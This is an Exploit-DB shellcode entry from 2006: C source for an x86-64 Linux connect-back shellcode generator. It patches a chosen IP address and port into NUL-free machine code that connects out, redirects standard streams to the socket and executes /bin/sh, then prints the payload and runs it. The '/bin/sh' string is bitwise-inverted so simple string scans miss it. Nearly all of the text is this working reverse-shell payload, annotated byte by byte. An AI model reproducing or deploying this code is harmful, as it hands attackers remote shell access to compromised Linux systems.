- EDB-ID
- 13297
- Автор
- PHAR
- Тип уязвимости
- SHELLCODE
- Платформа
- GENERATOR
- CVE
- N/A
- Дата публикации
- 2006-04-21
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
usual rant here.. this is just a doodle.. i was curious about
the amd64 and since i dont think a simple exec /bin/sh is worth releasing
i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stealth
because it contains the bullshit feature that the "/bin/sh" string isnt /easily/ noticeable (it is stored bitwise-inverted, so strings(1) does not see it)
this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints
if you might say "but..phar.. linux has 32 bit compatibility.. and i can just use existing shellcode"
to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatibility..
i checked.. its there... i promise"
im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited
by hand if needed.. (dont forget to invert: the host, port and "/bin/sh" bytes are stored bitwise-NOTed so the code stays NUL-free; the shellcode undoes that with `not` at run time)
bpp.etherdyne.net
www.stonedcoder.org
phar[at]stonedcoder[dot]org
*/
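/*
 * x86-64 Linux connect-back shellcode, 64-bit syscall ABI only
 * (socket=0x29, connect=0x2a, dup2=0x21, execve=0x3b, all via `syscall`).
 *
 * Byte layout (indices into sc_raw):
 *   0..16   socket(AF_INET, SOCK_STREAM, 0); fd -> %rdi, %rax is left = 2
 *   17..26  mov $imm64,%rcx -- the sockaddr_in, stored bitwise-NOTed so the
 *           shellcode contains no NUL bytes; `not %rcx` restores it
 *   27..54  connect(fd, %rsp, 16); dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)
 *   55..86  execve("/bin/sh", {"/bin/sh", NULL}, NULL)
 *
 * Once the NOTed immediate is pushed, memory at %rsp must read
 *     02 00 | <port, network order> | <host, network order>
 * i.e. sin_family = AF_INET at offset 0, sin_port at 2, sin_addr at 4, which is
 * the x86-64 sockaddr_in layout.  The bytes as originally published were
 * 00 00 00 00 11 11 ff fd, which after `not` leave ff ff ff ff ee ee 00 02 at
 * %rsp: host and port first and the family word last (and byte-swapped), so
 * sin_family was never AF_INET and connect() could not succeed.  They are
 * reordered below and PORTOFFSET/HOSTOFFSET updated to match.
 *
 * PORTOFFSET/HOSTOFFSET index the NOTed placeholders that main() overwrites
 * (port = ~htons(p), host = ~inet_addr(a)); an address or port byte equal to
 * 0xff turns into a NUL after inversion.  Nothing checks return values: if
 * connect() fails the code still dup2()s onto fd 3 and execs.
 */
char sc_raw[] =
"\x48\x31\xd2"              // xor    %rdx,%rdx          protocol = 0
"\x6a\x01"                  // pushq  $0x1
"\x5e"                      // pop    %rsi               SOCK_STREAM
"\x6a\x02"                  // pushq  $0x2
"\x5f"                      // pop    %rdi               AF_INET
"\x6a\x29"                  // pushq  $0x29
"\x58"                      // pop    %rax               SYS_socket
"\x0f\x05"                  // syscall
"\x48\x97"                  // xchg   %rax,%rdi          %rdi = fd, %rax = 2 (old %rdi)
"\x50"                      // push   %rax               ends up at %rsp+8 = sin_zero; value irrelevant
"\x48\xb9\xfd\xff\x11\x11"  // mov    $0x000000001111fffd,%rcx   NOTed sockaddr_in:
"\x00\x00\x00\x00"          //   19-20 ~AF_INET, 21-22 ~port (PORTOFFSET), 23-26 ~host (HOSTOFFSET)
"\x48\xf7\xd1"              // not    %rcx               -> 02 00 <port> <host>
"\x51"                      // push   %rcx
"\x48\x89\xe6"              // mov    %rsp,%rsi          &sockaddr_in
"\x6a\x10"                  // pushq  $0x10
"\x5a"                      // pop    %rdx               addrlen = 16
"\x6a\x2a"                  // pushq  $0x2a
"\x58"                      // pop    %rax               SYS_connect
"\x0f\x05"                  // syscall
"\x6a\x03"                  // pushq  $0x3
"\x5e"                      // pop    %rsi
// dup_loop: %rsi counts 2, 1, 0 -> dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)
"\x6a\x21"                  // pushq  $0x21
"\x58"                      // pop    %rax               SYS_dup2
"\x48\xff\xce"              // dec    %rsi               sets ZF when %rsi hits 0
"\x0f\x05"                  // syscall
"\x75\xf6"                  // jne    dup_loop           relies on ZF from `dec` surviving the syscall
"\x48\xbb\xd0\x9d\x96\x91"  // mov    $0xff978cd091969dd0,%rbx   ~"/bin/sh\0"
"\xd0\x8c\x97\xff"
"\x48\xf7\xd3"              // not    %rbx
"\x53"                      // push   %rbx               "/bin/sh\0" on the stack
"\x48\x89\xe7"              // mov    %rsp,%rdi          pathname
"\x48\x31\xc0"              // xor    %rax,%rax
"\x50"                      // push   %rax               argv[1] = NULL
"\x57"                      // push   %rdi               argv[0] = pathname
"\x48\x89\xe6"              // mov    %rsp,%rsi          argv
"\x48\x31\xd2"              // xor    %rdx,%rdx          envp = NULL
"\xb0\x3b"                  // mov    $0x3b,%al          SYS_execve (%rax upper bytes already 0)
"\x0f\x05"                  // syscall
;
/* Byte offsets into sc_raw of the NOTed port (2 bytes) and host (4 bytes)
 * placeholders inside the mov-imm64 above; main() memcpy()s over them. */
#define PORTOFFSET 21
#define HOSTOFFSET 23
void scprint(char *foo, int len);
void usage(void);
/* Function-pointer view of sc_raw so main() can run the payload in-process.
 * The cast is explicit: C does not convert object pointers to function
 * pointers implicitly.  NOTE(review): sc_raw lives in writable data; on a
 * system with a non-executable data segment the call faults unless the page
 * is made executable first (mprotect, or linking with -z execstack). */
void (*shellcode)(void) = (void (*)(void))sc_raw;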
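/*
 * Generator entry point.  argv[1] is a dotted-quad IPv4 address, argv[2] a TCP
 * port.  Both are bitwise-NOTed and patched into sc_raw at HOSTOFFSET /
 * PORTOFFSET (the shellcode inverts them back with `not`), the finished
 * shellcode is printed as a C string literal, and it is then executed
 * in-process as a smoke test.
 * Exits 1 on bad arguments; does not return if the shellcode runs.
 */
int main(int argc, char *argv[])
{
    if (argc != 3) { /* i'll only do so much to save you from stupidity */
        usage();
        exit(1);
    }
    /* inet_addr() parses numeric addresses only and returns INADDR_NONE
     * (all ones) on failure; reject that instead of patching garbage in. */
    in_addr_t addr = inet_addr(argv[1]);
    if (addr == INADDR_NONE) {
        fprintf(stderr, "bad ip address: %s\n", argv[1]);
        usage();
        exit(1);
    }
    /* strtol instead of atoi so junk and out-of-range ports are refused. */
    errno = 0;
    char *end = NULL;
    long p = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || p < 1 || p > 65535) {
        fprintf(stderr, "bad port number: %s\n", argv[2]);
        usage();
        exit(1);
    }
    /* Stored inverted so the patched bytes are NUL-free (unless an address
     * or port byte is 0xff); network byte order is kept, as the shellcode
     * drops the bytes straight into sockaddr_in. */
    uint32_t host = ~addr;
    uint16_t port = (uint16_t)~htons((uint16_t)p);
    memcpy(&sc_raw[HOSTOFFSET], &host, sizeof host);
    memcpy(&sc_raw[PORTOFFSET], &port, sizeof port);
    /* sizeof(sc_raw) counts the string terminator; don't print it as a
     * trailing \x00 of an otherwise NUL-free payload. */
    scprint(sc_raw, (int)(sizeof(sc_raw) - 1));
    /* NOTE(review): sc_raw is in writable data; on a system with a
     * non-executable data segment this call faults unless the page is made
     * executable first (mprotect, or linking with -z execstack). */
    shellcode();
    return 0;
}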
/*
 * Print `len` bytes of `foo` as a C string literal of \xNN escapes, wrapped
 * in `char shellcode[]="...";` and a trailing newline, then flush stdout so
 * the listing is visible even if the caller never returns.
 */
void scprint(char *foo, int len)
{
    const unsigned char *bytes = (const unsigned char *)foo;
    int idx = 0;
    fputs("char shellcode[]=\"", stdout);
    while (idx < len) {
        printf("\\x%02x", bytes[idx]);
        idx++;
    }
    fputs("\";\n", stdout);
    fflush(stdout);
}
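/*
 * Print the command-line synopsis to stdout.  The generator takes a numeric
 * IPv4 address (inet_addr() does not resolve hostnames) and a TCP port.
 * The original used "./%s" with no matching argument, which is undefined
 * behaviour (printf reads a vararg that was never passed); the program name
 * is not available here, so a fixed placeholder is printed instead.
 */
void usage(void)
{
    fputs("usage: ./<generator> <ip address.. and i mean ip address> <port number>\n\n", stdout);
}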
// milw0rm.com [2006-04-21]